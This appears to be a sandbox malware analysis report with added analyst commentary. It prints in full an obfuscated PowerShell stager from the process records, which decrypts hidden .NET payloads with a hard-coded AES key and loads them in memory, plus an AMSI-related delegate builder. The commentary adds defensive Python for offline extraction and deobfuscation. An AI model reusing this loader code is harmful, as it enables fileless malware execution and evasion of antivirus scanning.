Source: Binary string: System.Management.Automation.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WER4655.tmp.dmp.45.dr
Source: Binary string: mscorlib.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Management.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Management.Automation.pdb3 source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: mscorlib.pdbPYW source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Management.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Core.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Transactions.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Configuration.pdbH source: WER4655.tmp.dmp.45.dr
Source: Binary string: System.Core.pdbiy source: WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Transactions.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Numerics.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr
Source: Binary string: System.Numerics.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Transactions.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr

Data Obfuscation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer($NIFilsXpyGNtBG,$LwazNVXndbOnNGQThDI).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'');$kmefLeFZtUxOoKQt
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+'e'+[Char](99)+'t'+'e'+''+'d'+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+'g'+'a'+'te')),[R
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+'F'+''+[Char](84)+''+[Char](87)+'A'+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](110)+''+'y'+''+[Char](97)+''+'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:TnoNKHHDUXvA{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wrAnTRmMMLZATy,[Parameter(Position=1)][Type]$iejhPFpNZp)$FisCHMOcbia=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+'e'+[Char](99)+'t'+'e'+''+'d'+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+'g'+'a'+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+'e'+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+''+'T'+''+'y'+''+'p'+'e',''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+','+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+'l'+[Char](101)+'d,'+'A'+''+'n'+'s'+[Char](105)+'C'+'l'+''+[Char](97)+''+'s'+'s,'+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+'C'+'l'+''+[Char](97)+''+'s'+''+'s'+'',[MulticastDelegate]);$FisCHMOcbia.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+[Char](101)+'c'+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+''+'i'+''+'d'+'e'+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$wrAnTRmMMLZATy).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$FisCHMOcbia.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+',H'+[Char](105)+'d'+'e'+''+[Char](66)+'y'+'S'+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+''+'S'+'l'+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+'a'+''+[Char](108)+'',$iejhPFpNZp,$wrAnTRmMMLZATy).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+''+','+''+'M'+'a'+[Char](110)+'a'+'g'+''+'e'+''+[Char](100)+'');Write-Output $FisCHMOcbia.CreateType();}$beUOypwDoUbYD=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+[Char](115)+''+'t'+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType('M'+[Char](105)+'cro'+[Char](115)+''+'o'+'f'+'t'+'.'+'W'+''+[Char](105)+'n32'+[Char](46)+'U'+'n'+'s'+'a'+''+[Char](102)+''+'e'+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+'e'+'t'+''+'h'+'o'+[Char](100)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC; $SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU='); $SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq, 0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*', ''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose(); $klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*', ''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*', '');}$XpYqP = 'C:\Users\user\AppData\Local\Temp\tmp6432.tmp.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach ($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX '$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]] ('')); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC; $SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU='); $SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq, 0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*', ''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose(); $klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*', ''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*', '');}$XpYqP = 'C:\Windows\$nya-onimai3\$nya-Loli.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach ($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX '$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]] ('')); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC; $SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU='); $SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq, 0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*', ''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose(); $klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*', ''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*', '');}$XpYqP = 'C:\Users\user\AppData\Local\Temp\tmp6432.tmp.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach ($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX '$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]] ('')); "
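The echoed PowerShell above is a two-stage loader that never touches disk with a decoded payload: it reads a carrier .bat (C:\Windows\$nya-onimai3\$nya-Loli.bat, or the %TEMP%\tmp6432.tmp.bat copy), takes the first line that begins with ":: " (a batch comment, so the file still runs as a script), splits it on "\", and for each field does Base64 decode, AES-CBC/PKCS7 decrypt with the key and IV hard-coded in the command line, GZip inflate, and [Reflection.Assembly]::Load followed by EntryPoint.Invoke. Because the key and IV are static, an analyst can recover both .NET assemblies from any carrier this stager drops without executing them. The Python below is an added example written for this report, not code from the sample or the sandbox; it re-implements the decode path and writes the payloads out as stage<N>.bin for static analysis. It assumes the `cryptography` package for the AES step (the carrier parsing and GZip checks work without it), and the output file names are the author's choice.

```python
"""Offline extractor for the two-stage carrier used by the $nya-* stager.

Added example for this report; not code from the sample or from the sandbox.
It re-implements, without executing anything, the decode path the echoed
PowerShell performs: read the .bat, take the first line beginning ':: ',
split it on '\\', then per field Base64 -> AES-CBC/PKCS7 -> GZip -> .NET PE.
The stager hands the result to [Reflection.Assembly]::Load; this writes it
to disk instead so it can be examined statically.

Assumptions: the `cryptography` package is available for the AES step; the
output names stage<N>.bin and every sample input in the tests are constructed.
"""
import base64
import gzip
import sys

# Key and IV exactly as hard-coded in the stager command line in the report.
# A 32-byte key means AES-256; the IV is one 16-byte block.
STAGER_KEY_B64 = "u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU="
STAGER_IV_B64 = "YnJt8rKkmfjICvof8Wpokg=="


def load_key_iv(key_b64=STAGER_KEY_B64, iv_b64=STAGER_IV_B64):
    """Decode the Base64 key/IV and reject sizes AES-CBC cannot use."""
    key, iv = base64.b64decode(key_b64), base64.b64decode(iv_b64)
    if len(key) not in (16, 24, 32):
        raise ValueError(f"AES key must be 16/24/32 bytes, got {len(key)}")
    if len(iv) != 16:
        raise ValueError(f"AES-CBC IV must be 16 bytes, got {len(iv)}")
    return key, iv


def parse_carrier(bat_text):
    """Mirror the stager's file walk: first ':: ' comment line, marker dropped,
    fields split on '\\', each Base64-decoded. Returns the raw ciphertexts."""
    for line in bat_text.splitlines():
        if not line.startswith(":: "):
            continue
        blobs = [base64.b64decode(f, validate=True) for f in line[3:].split("\\")]
        for i, ct in enumerate(blobs):
            # CBC ciphertext with PKCS7 padding is always a whole number of blocks.
            if not ct or len(ct) % 16:
                raise ValueError(f"field {i}: {len(ct)} bytes is not block-aligned")
        return blobs
    raise ValueError("no ':: ' payload line found in carrier")


def aes_cbc_decrypt(ciphertext, key, iv):
    """AES-CBC decrypt and strip PKCS7, what TransformFinalBlock does in the stager."""
    try:
        from cryptography.hazmat.primitives import padding
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    except ImportError as exc:  # parsing and gunzip still work without it
        raise RuntimeError("pip install cryptography to run the AES step") from exc
    dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    padded = dec.update(ciphertext) + dec.finalize()
    unpadder = padding.PKCS7(128).unpadder()
    return unpadder.update(padded) + unpadder.finalize()


def gunzip_assembly(blob):
    """GZip-inflate and check the result is a PE image ('MZ'), as Assembly.Load expects."""
    data = gzip.decompress(blob)
    if data[:2] != b"MZ":
        raise ValueError("decompressed payload is not a PE image")
    return data


def extract_payloads(bat_text, key_b64=STAGER_KEY_B64, iv_b64=STAGER_IV_B64):
    """Carrier text -> list of plaintext PE images, in the order the stager runs them
    (field 0 is invoked with no arguments, field 1 with an empty string[] argv)."""
    key, iv = load_key_iv(key_b64, iv_b64)
    return [gunzip_assembly(aes_cbc_decrypt(ct, key, iv)) for ct in parse_carrier(bat_text)]


if __name__ == "__main__":
    # Usage: python extract_nya.py <carrier.bat>   -> stage0.bin, stage1.bin, ...
    with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
        for n, pe in enumerate(extract_payloads(fh.read())):
            with open(f"stage{n}.bin", "wb") as out:
                out.write(pe)
            print(f"stage{n}.bin: {len(pe)} bytes")
```

The block-alignment and MZ checks are there so a wrong key, a re-keyed variant, or a truncated carrier fails loudly instead of producing garbage that gets loaded into a disassembler. Feed the resulting stage0.bin / stage1.bin to a .NET decompiler rather than running them.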
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:TnoNKHHDUXvA{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wrAnTRmMMLZATy,[Parameter(Position=1)][Type]$iejhPFpNZp)$FisCHMOcbia=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+'e'+[Char](99)+'t'+'e'+''+'d'+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+'g'+'a'+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+'e'+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+''+'T'+''+'y'+''+'p'+'e',''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+','+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+'l'+[Char](101)+'d,'+'A'+''+'n'+'s'+[Char](105)+'C'+'l'+''+[Char](97)+''+'s'+'s,'+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+'C'+'l'+''+[Char](97)+''+'s'+''+'s'+'',[MulticastDelegate]);$FisCHMOcbia.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+[Char](101)+'c'+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+''+'i'+''+'d'+'e'+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$wrAnTRmMMLZATy).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$FisCHMOcbia.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+',H'+[Char](105)+'d'+'e'+''+[Char](66)+'y'+'S'+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+''+'S'+'l'+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+'a'+''+[Char](108)+'',$iejhPFpNZp,$wrAnTRmMMLZATy).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+''+','+''+'M'+'a'+[Char](110)+'a'+'g'+''+'e'+''+[Char](100)+'');Write-Output $FisCHMOcbia.CreateType();}$beUOypwDoUbYD=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+[Char](115)+''+'t'+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType('M'+[Char](105)+'cro'+[Char](115)+''+'o'+'f'+'t'+'.'+'W'+''+[Char](105)+'n32'+[Char](46)+'U'+'n'+'s'+'a'+''+[Char](102)+''+'e'+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+'e'+'t'+''+'h'+'o'+[Char](100)
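The report shows two string-hiding idioms worth decoding before anything else. The stager above sprinkles `*` through type and method names and strips them at runtime with `IEX '...'.Replace('*', '')`, so the words MemoryStream, GZipStream, Reflection.Assembly, Load and FromBase64String never appear contiguously on the command line. The second command line (which the report cuts off mid-string) builds every literal from `[Char](N)` and one- or two-letter pieces; folded, it is a Reflection.Emit delegate builder (assembly name ReflectedDelegate, module InMemoryModule, type MyDelegateType, an Invoke method) followed by a lookup of a type in the GAC copy of System.dll, the usual prelude for calling native APIs from PowerShell without Add-Type. The Python below is an added example for this report, not code from the sample or the sandbox: two regex passes that undo both idioms. The fragments in SAMPLES are copied verbatim from the two command lines; the regexes, function names and expected outputs are the author's. It only folds single-quoted literals and `[Char](N)` terms, which is all this sample uses.

```python
"""Static deobfuscation of the two string-hiding idioms in this report's
PowerShell command lines. Added example; not code from the sample or the sandbox.

  1. IEX '<text with * sprinkled in>'.Replace('*', '')
     The stager hides MemoryStream, GZipStream, Reflection.Assembly::Load and
     FromBase64String this way; removing the stars gives the statement IEX runs.
  2. ''+[Char](82)+'l'+'e'+[Char](99)+...
     The second command line builds every string (assembly, module and type
     names, attribute lists, 'System.dll') from [Char](N) and 1-2 letter pieces.

The fragments in SAMPLES are copied from the report; the regexes, the function
names and the expected outputs are ours. Only single-quoted literals and
[Char](N) terms are folded, which is all this sample uses.
"""
import re

_TERM = r"(?:'[^']*'|\[Char\]\(\d+\))"                # one concatenation operand
_CHAIN = re.compile(rf"{_TERM}(?:\s*\+\s*{_TERM})+")  # two or more joined by '+'
_CHAR = re.compile(r"\[Char\]\((\d+)\)")
_IEX_STAR = re.compile(r"IEX\s+'([^']*)'\.Replace\('\*',\s*''\)(;?)")

SAMPLES = {
    # Reflection.Emit delegate builder, second command line
    "assembly_name": "''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+'e'+[Char](99)+'t'+'e'+''+'d'+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+'g'+'a'+'te'",
    "module_name": "'I'+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+''",
    "type_name": "''+'M'+''+[Char](121)+''+[Char](68)+'e'+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+''+'T'+''+'y'+''+'p'+'e'",
    "type_attrs": "''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+','+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+'l'+[Char](101)+'d,'+'A'+''+'n'+'s'+[Char](105)+'C'+'l'+''+[Char](97)+''+'s'+'s,'+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+'C'+'l'+''+[Char](97)+''+'s'+''+'s'+''",
    "gac_dll": "''+'S'+'y'+[Char](115)+''+'t'+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+''",
    # star-padded IEX strings from the stager
    "stager_gzip": "IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', '');",
    "stager_load": "IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*', '');",
    "stager_b64": "IEX '$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');",
}


def fold_char_concat(script):
    """Collapse every 'a'+[Char](N)+'b' chain into one single-quoted literal."""
    def _fold(m):
        parts = []
        for tok in re.findall(_TERM, m.group(0)):
            parts.append(tok[1:-1] if tok.startswith("'") else chr(int(_CHAR.match(tok).group(1))))
        return "'" + "".join(parts) + "'"
    return _CHAIN.sub(_fold, script)


def unstar_iex(script):
    """Replace IEX '...*...'.Replace('*','') with the statement IEX would execute."""
    def _unstar(m):
        stmt = m.group(1).replace("*", "")
        # keep exactly one terminating ';' when the hidden statement already has one
        return stmt if stmt.endswith(";") else stmt + m.group(2)
    return _IEX_STAR.sub(_unstar, script)


def deobfuscate(script):
    """Both passes; IEX strings first so any [Char] chains inside them are folded too."""
    return fold_char_concat(unstar_iex(script))


def deobfuscate_samples():
    """Run the decoder over the fragments copied from the report."""
    return {name: deobfuscate(frag) for name, frag in SAMPLES.items()}


if __name__ == "__main__":
    for name, clean in deobfuscate_samples().items():
        print(f"{name:14s} {clean}")
```

Run `deobfuscate` over the whole command line from an EDR or Sysmon event 1 record and the Reflection.Emit / GAC-lookup structure becomes readable; the folded literals (ReflectedDelegate, InMemoryModule, MyDelegateType, System.dll) are also stable strings to pivot on, since the operator can re-randomise the variable names but not the .NET identifiers the code depends on.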
Source: AdjustLoader.exe Static PE information: 0xB2DAB3E1 [Sun Feb 1 01:29:05 2065 UTC]
Source: C:\Users\user\Desktop\AdjustLoader.exe Code function: 0_2_00007FFD9B7E00AD pushad ; iretd 0_2_00007FFD9B7E00C1
Source: C:\Windows\System32\cmd.exe Code function: 1_3_00000208442EA5DD push rcx; retf 003Fh 1_3_00000208442EA5DE
Source: C:\Windows\System32\conhost.exe Code function: 2_3_0000020E8B1DA5DD push rcx; retf 003Fh 2_3_0000020E8B1DA5DE
